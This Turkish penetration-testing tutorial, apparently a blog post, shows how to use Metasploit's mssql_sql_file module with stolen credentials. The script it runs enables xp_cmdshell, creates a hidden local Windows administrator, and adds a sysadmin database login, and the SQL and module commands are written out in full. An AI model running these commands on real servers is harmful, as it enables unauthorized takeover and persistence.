MSF mssql_sql_file Auxiliary Modülü ile MS SQL Veritabanında Betik Dosyaları Kullanılarak SQL Sorgularının Gerçekleştirilmesi

0
21
views
Sızma testleri sırasında, erişim bilgileri elde edilen MS SQL veritabanı uygulamasında bir betik dosyasında yazılı olan SQL komutları ile sorgulama gerçekleştirilmesi gerekmektedir. Bu yazıda, MSF mssql_sql_file auxiliary modülü kullanılarak, MS SQL sunucunda bir dosyada kayıtlı olan SQL sorguları ile bir komut çalıştırılacaktır.

MSSQL veritabanında xp_cmdshell konfigürasyonunu etkinleştiren, işletim sistemi üzerinde yeni bir yerel yönetici ve veritabanı üzerinde “sysadmin” rolünde yeni bir veritabanı kullanıcısı oluşturan bir betik aşağıdaki gibidir.

EXECUTE sp_configure ‘show advanced options’, 1; RECONFIGURE WITH OVERRIDE;
EXECUTE sp_configure ‘xp_cmdshell’, 1; RECONFIGURE WITH OVERRIDE;

EXECUTE (‘master.sys.xp_cmdshell ”net user YerelYonetici Yy123456 /add” ‘);
EXECUTE (‘master.sys.xp_cmdshell ”net localgroup Administrators YerelYonetici /add” ‘);

Create Login UygulamaYoneticisi with password = ‘Uu123456’;
EXEC sp_addsrvrolemember @loginame = UygulamaYoneticisi, @rolename = sysadmin

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-01

Kurum ağında 10.20.30.72 IP adresindeki MS SQL veritabanına ait erişim bilgileri, “Test/Tt123456” olarak elde edilmiş olsun. Bu kullanıcının hakları ile, veritabanında betik dosyasındaki SQL sorgularını çalıştırmak için MSF mssql_sql_file modülü kullanılabilir. Bu amaçla, modül seçilir ve seçenekleri incelenir.

search mssql_sql_file
use auxiliary/admin/mssql/mssql_sql_file
show options

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-02

Modüle IP adresi, erişim için gerekli kimlik bilgisi verilerek modül seçenekleri ayarlanabilir.

set RHOST 10.20.30.72
set USERNAME Test
set PASSWORD Tt123456
set SQL_FILE /root/Desktop/SqlBetik.txt
show options

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-03

Seçenekler ayarlandırıldıktan sonra modül çalıştırılabilir. Modül çalıştırıldığında modüle parametre olarak verilen kullanıcı hakları ile belirtilen SQL dosyasındaki komutlar çalıştırılır.

run

performing-multiple-sql-queries-within-a-file-on-ms-sql-database-by-using-msf-mssql-sql-file-auxiliary-module-04

 

CEVAP VER

Yorumunuzu giriniz
İsminizi giriniz